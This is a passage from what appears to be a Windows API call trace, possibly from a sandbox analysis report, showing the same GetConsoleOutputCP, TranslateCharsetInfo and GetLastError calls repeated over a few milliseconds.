() returned 0xcb [0152.283] GetConsoleOutputCP () returned 0x1b5 [0152.283] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.283] GetLastError () returned 0xcb [0152.283] GetConsoleOutputCP () returned 0x1b5 [0152.283] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.283] GetLastError () returned 0xcb [0152.283] GetConsoleOutputCP () returned 0x1b5 [0152.283] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.283] GetLastError () returned 0xcb [0152.283] GetConsoleOutputCP () returned 0x1b5 [0152.283] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.283] GetLastError () returned 0xcb [0152.284] GetConsoleOutputCP () returned 0x1b5 [0152.284] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.284] GetLastError () returned 0xcb [0152.284] GetConsoleOutputCP () returned 0x1b5 [0152.284] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.284] GetLastError () returned 0xcb [0152.284] GetConsoleOutputCP () returned 0x1b5 [0152.284] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.284] GetLastError () returned 0xcb [0152.284] GetConsoleOutputCP () returned 0x1b5 [0152.284] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.284] GetLastError () returned 0xcb [0152.284] GetConsoleOutputCP () returned 0x1b5 [0152.284] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.284] GetLastError () returned 0xcb [0152.284] GetConsoleOutputCP () returned 0x1b5 [0152.284] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.284] GetLastError () returned 0xcb [0152.284] GetConsoleOutputCP () returned 0x1b5 [0152.284] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.284] GetLastError () returned 0xcb [0152.284] GetConsoleOutputCP () returned 0x1b5 [0152.284] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.285] GetLastError () returned 0xcb [0152.285] GetConsoleOutputCP () returned 0x1b5 [0152.285] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.285] GetLastError () returned 0xcb [0152.285] GetConsoleOutputCP () returned 0x1b5 [0152.285] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.285] GetLastError () returned 0xcb [0152.285] GetConsoleOutputCP () returned 0x1b5 [0152.285] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.285] GetLastError () returned 0xcb [0152.285] GetConsoleOutputCP () returned 0x1b5 [0152.285] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.285] GetLastError () returned 0xcb [0152.285] GetConsoleOutputCP () returned 0x1b5 [0152.285] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.285] GetLastError () returned 0xcb [0152.285] GetConsoleOutputCP () returned 0x1b5 [0152.285] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.285] GetLastError () returned 0xcb [0152.285] GetConsoleOutputCP () returned 0x1b5 [0152.285] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.285] GetLastError () returned 0xcb [0152.285] GetConsoleOutputCP () returned 0x1b5 [0152.286] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.286] GetLastError () returned 0xcb [0152.286] GetConsoleOutputCP () returned 0x1b5 [0152.286] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.286] GetLastError () returned 0xcb [0152.286] GetConsoleOutputCP () returned 0x1b5 [0152.286] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.286] GetLastError () returned 0xcb [0152.286] GetConsoleOutputCP () returned 0x1b5 [0152.286] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.286] GetLastError () returned 0xcb [0152.286] GetConsoleOutputCP () returned 0x1b5 [0152.286] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.286] GetLastError () returned 0xcb [0152.286] GetConsoleOutputCP () returned 0x1b5 [0152.286] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.286] GetLastError () returned 0xcb [0152.286] GetConsoleOutputCP () returned 0x1b5 [0152.287] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.287] GetLastError () returned 0xcb [0152.287] GetConsoleOutputCP () returned 0x1b5 [0152.287] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.287] GetLastError () returned 0xcb [0152.287] GetConsoleOutputCP () returned 0x1b5 [0152.287] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.287] GetLastError () returned 0xcb [0152.287] GetConsoleOutputCP () returned 0x1b5 [0152.287] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.287] GetLastError () returned 0xcb [0152.287] GetConsoleOutputCP () returned 0x1b5 [0152.287] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.287] GetLastError () returned 0xcb [0152.287] GetConsoleOutputCP () returned 0x1b5 [0152.287] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.287] GetLastError () returned 0xcb [0152.287] GetConsoleOutputCP () returned 0x1b5 [0152.287] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.288] GetLastError () returned 0xcb [0152.288] GetConsoleOutputCP () returned 0x1b5 [0152.288] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.288] GetLastError () returned 0xcb [0152.288] GetConsoleOutputCP () returned 0x1b5 [0152.288] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.288] GetLastError () returned 0xcb [0152.288] GetConsoleOutputCP () returned 0x1b5 [0152.288] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.288] GetLastError () returned 0xcb [0152.288] GetConsoleOutputCP () returned 0x1b5 [0152.288] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.288] GetLastError () returned 0xcb [0152.288] GetConsoleOutputCP () returned 0x1b5 [0152.288] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.288] GetLastError () returned 0xcb [0152.288] GetConsoleOutputCP () returned 0x1b5 [0152.288] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.288] GetLastError () returned 0xcb [0152.288] GetConsoleOutputCP () returned 0x1b5 [0152.288] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.289] GetLastError () returned 0xcb [0152.289] GetConsoleOutputCP () returned 0x1b5 [0152.289] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.289] GetLastError () returned 0xcb [0152.289] GetConsoleOutputCP () returned 0x1b5 [0152.289] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.289] GetLastError () returned 0xcb [0152.289] GetConsoleOutputCP () returned 0x1b5 [0152.289] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.289] GetLastError () returned 0xcb [0152.289] GetConsoleOutputCP () returned 0x1b5 [0152.289] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.289] GetLastError () returned 0xcb [0152.289] GetConsoleOutputCP () returned 0x1b5 [0152.289] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.289] GetLastError () returned 0xcb [0152.289] GetConsoleOutputCP () returned 0x1b5 [0152.289] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.289] GetLastError () returned 0xcb [0152.289] GetConsoleOutputCP () returned 0x1b5 [0152.289] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.289] GetLastError () returned 0xcb [0152.289] GetConsoleOutputCP () returned 0x1b5 [0152.289] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.289] GetLastError () returned 0xcb [0152.289] GetConsoleOutputCP () returned 0x1b5 [0152.290] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.290] GetLastError () returned 0xcb [0152.290] GetConsoleOutputCP () returned 0x1b5 [0152.290] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.290] GetLastError () returned 0xcb [0152.290] GetConsoleOutputCP () returned 0x1b5 [0152.290] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.290] GetLastError () returned 0xcb [0152.290] GetConsoleOutputCP () returned 0x1b5 [0152.290] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.290] GetLastError () returned 0xcb [0152.290] GetConsoleOutputCP () returned 0x1b5 [0152.290] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.290] GetLastError () returned 0xcb [0152.290] GetConsoleOutputCP () returned 0x1b5 [0152.290] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.290] GetLastError () returned 0xcb [0152.290] GetConsoleOutputCP () returned 0x1b5 [0152.290] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.290] GetLastError () returned 0xcb [0152.290] GetConsoleOutputCP () returned 0x1b5 [0152.290] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.290] GetLastError () returned 0xcb [0152.290] GetConsoleOutputCP () returned 0x1b5 [0152.291] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.291] GetLastError () returned 0xcb [0152.291] GetConsoleOutputCP () returned 0x1b5 [0152.291] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.291] GetLastError () returned 0xcb [0152.291] GetConsoleOutputCP () returned 0x1b5 [0152.291] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.291] GetLastError () returned 0xcb [0152.291] GetConsoleOutputCP () returned 0x1b5 [0152.291] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.291] GetLastError () returned 0xcb [0152.291] GetConsoleOutputCP () returned 0x1b5 [0152.291] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.291] GetLastError () returned 0xcb [0152.291] GetConsoleOutputCP () returned 0x1b5 [0152.291] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.291] GetLastError () returned 0xcb [0152.291] GetConsoleOutputCP () returned 0x1b5 [0152.291] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.291] GetLastError () returned 0xcb [0152.291] GetConsoleOutputCP () returned 0x1b5 [0152.291] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.291] GetLastError () returned 0xcb [0152.291] GetConsoleOutputCP () returned 0x1b5 [0152.291] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea70, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea70) returned 0 [0152.292] GetLastError () returned 0xcb [0152.292] GetConsoleOutputCP () returned 0x1b5 [0152.292] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea70, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea70) returned 0 [0152.292] GetLastError () returned 0xcb [0152.292] GetConsoleOutputCP () returned 0x1b5 [0152.292] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea70, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea70) returned 0 [0152.292] GetLastError () returned 0xcb [0152.292] GetConsoleOutputCP () returned 0x1b5 [0152.292] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea70, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea70) returned 0 [0152.292] GetLastError () returned 0xcb [0152.292] GetConsoleOutputCP () returned 0x1b5 [0152.292] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea70, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea70) returned 0 [0152.292] GetLastError () returned 0xcb [0152.292] GetConsoleOutputCP () returned 0x1b5 [0152.292] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.292] GetLastError () returned 0xcb [0152.292] GetConsoleOutputCP () returned 0x1b5 [0152.292] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.292] GetLastError () returned 0xcb [0152.292] GetConsoleOutputCP () returned 0x1b5 [0152.292] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.292] GetLastError () returned 0xcb [0152.292] GetConsoleOutputCP () returned 0x1b5 [0152.292] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.293] GetLastError () returned 0xcb [0152.293] GetConsoleOutputCP () returned 0x1b5 [0152.293] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.293] GetLastError () returned 0xcb [0152.293] GetConsoleOutputCP () returned 0x1b5 [0152.293] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.293] GetLastError () returned 0xcb [0152.293] GetConsoleOutputCP () returned 0x1b5 [0152.293] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.293] GetLastError () returned 0xcb [0152.293] GetConsoleOutputCP () returned 0x1b5 [0152.293] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.293] GetLastError () returned 0xcb [0152.293] GetConsoleOutputCP () returned 0x1b5 [0152.293] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.293] GetLastError () returned 0xcb [0152.293] GetConsoleOutputCP () returned 0x1b5 [0152.293] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.293] GetLastError () returned 0xcb [0152.293] GetConsoleOutputCP () returned 0x1b5 [0152.293] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.293] GetLastError () returned 0xcb [0152.293] GetConsoleOutputCP () returned 0x1b5 [0152.294] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.294] GetLastError () returned 0xcb [0152.294] GetConsoleOutputCP () returned 0x1b5 [0152.294] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.294] GetLastError () returned 0xcb [0152.294] GetConsoleOutputCP () returned 0x1b5 [0152.294] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.294] GetLastError () returned 0xcb [0152.294] GetConsoleOutputCP () returned 0x1b5 [0152.294] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.294] GetLastError () returned 0xcb [0152.294] GetConsoleOutputCP () returned 0x1b5 [0152.294] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.294] GetLastError () returned 0xcb [0152.294] GetConsoleOutputCP () returned 0x1b5 [0152.294] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.294] GetLastError () returned 0xcb [0152.294] GetConsoleOutputCP () returned 0x1b5 [0152.294] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.294] GetLastError () returned 0xcb [0152.294] GetConsoleOutputCP () returned 0x1b5 [0152.294] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.294] GetLastError () returned 0xcb [0152.294] GetConsoleOutputCP () returned 0x1b5 [0152.295] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.295] GetLastError () returned 0xcb [0152.295] GetConsoleOutputCP () returned 0x1b5 [0152.295] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.295] GetLastError () returned 0xcb [0152.295] GetConsoleOutputCP () returned 0x1b5 [0152.295] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.295] GetLastError () returned 0xcb [0152.295] GetConsoleOutputCP () returned 0x1b5 [0152.295] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.295] GetLastError () returned 0xcb [0152.295] GetConsoleOutputCP () returned 0x1b5 [0152.295] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.295] GetLastError () returned 0xcb [0152.295] GetConsoleOutputCP () returned 0x1b5 [0152.295] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.295] GetLastError () returned 0xcb [0152.295] GetConsoleOutputCP () returned 0x1b5 [0152.295] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.295] GetLastError () returned 0xcb [0152.295] GetConsoleOutputCP () returned 0x1b5 [0152.295] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.295] GetLastError () returned 0xcb [0152.295] GetConsoleOutputCP () returned 0x1b5 [0152.296] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.296] GetLastError () returned 0xcb [0152.296] GetConsoleOutputCP () returned 0x1b5 [0152.296] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.296] GetLastError () returned 0xcb [0152.296] GetConsoleOutputCP () returned 0x1b5 [0152.296] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.296] GetLastError () returned 0xcb [0152.296] GetConsoleOutputCP () returned 0x1b5 [0152.296] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.296] GetLastError () returned 0xcb [0152.296] GetConsoleOutputCP () returned 0x1b5 [0152.296] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.296] GetLastError () returned 0xcb [0152.296] GetConsoleOutputCP () returned 0x1b5 [0152.296] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.296] GetLastError () returned 0xcb [0152.296] GetConsoleOutputCP () returned 0x1b5 [0152.296] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.296] GetLastError () returned 0xcb [0152.296] GetConsoleOutputCP () returned 0x1b5 [0152.297] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.297] GetLastError () returned 0xcb [0152.297] GetConsoleOutputCP () returned 0x1b5 [0152.297] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.297] GetLastError () returned 0xcb [0152.297] GetConsoleOutputCP () returned 0x1b5 [0152.297] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.297] GetLastError () returned 0xcb [0152.297] GetConsoleOutputCP () returned 0x1b5 [0152.297] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.297] GetLastError () returned 0xcb [0152.297] GetConsoleOutputCP () returned 0x1b5 [0152.297] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.297] GetLastError () returned 0xcb [0152.297] GetConsoleOutputCP () returned 0x1b5 [0152.297] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.297] GetLastError () returned 0xcb [0152.297] GetConsoleOutputCP () returned 0x1b5 [0152.297] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.297] GetLastError () returned 0xcb [0152.297] GetConsoleOutputCP () returned 0x1b5 [0152.298] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.298] GetLastError () returned 0xcb [0152.298] GetConsoleOutputCP () returned 0x1b5 